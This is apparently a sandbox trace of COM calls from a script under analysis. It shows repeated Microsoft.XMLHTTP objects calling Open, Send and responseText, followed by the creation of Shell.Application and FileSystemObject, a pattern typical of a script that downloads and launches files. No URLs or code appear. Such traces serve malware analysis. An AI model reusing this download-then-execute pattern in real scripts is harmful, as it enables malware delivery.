	[0235.846] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0235.846] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0235.846] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c18) returned 0x0
	[0235.846] ??2@YAPEAX_K@Z () returned 0x62f330
	[0235.846] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c18, pUnkSite=0x62f330) 
	[0235.846] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0235.846] XMLHTTPRequest:IUnknown:Release (This=0x49c5c18) returned 0x0
	[0235.846] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0235.846] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0235.846] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0235.846] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0235.846] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0235.846] longjmp () 
	[0235.846] longjmp () 
	[0235.846] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0235.847] SysStringLen (param_1=0x0) returned 0x0
	[0235.847] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0235.847] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0235.847] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0235.847] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0235.847] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0235.847] ??2@YAPEAX_K@Z () returned 0x62f310
	[0235.847] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0235.847] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0235.847] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0235.847] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0235.847] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0235.847] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0235.847] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0235.847] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0235.847] longjmp () 
	[0235.848] longjmp () 
	[0235.848] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0235.848] SysStringLen (param_1=0x0) returned 0x0
	[0235.848] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0235.848] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0235.848] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0235.848] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0235.848] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c18) returned 0x0
	[0235.848] ??2@YAPEAX_K@Z () returned 0x62f330
	[0235.848] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c18, pUnkSite=0x62f330) 
	[0235.848] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0235.848] XMLHTTPRequest:IUnknown:Release (This=0x49c5c18) returned 0x0
	[0235.848] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0235.848] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0235.848] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0235.848] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0235.848] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0235.849] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0235.849] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0235.849] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0236.089] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0236.089] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0236.090] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0236.090] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0236.090] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0236.090] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0236.090] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0236.090] SysStringLen (param_1=0x0) returned 0x0
	[0236.090] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0236.090] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0236.090] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0236.090] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0236.090] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0236.090] ??2@YAPEAX_K@Z () returned 0x62f350
	[0236.091] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0236.091] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0236.091] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0236.091] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0236.091] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0236.091] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0236.091] SysStringLen (param_1=0x0) returned 0x0
	[0236.091] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0236.095] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0236.095] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0236.095] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0236.095] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0236.095] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0236.095] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0236.263] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0236.263] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0236.263] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0236.266] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0236.266] SysStringLen (param_1=0x0) returned 0x0
	[0236.266] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0236.267] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0236.267] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0236.267] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0236.267] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0236.267] ??2@YAPEAX_K@Z () returned 0x62f330
	[0236.267] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0236.267] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0236.267] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0236.267] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0236.267] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0236.267] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0236.267] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0236.271] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0236.272] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0236.272] SysStringLen (param_1=0x0) returned 0x0
	[0236.272] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0236.272] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
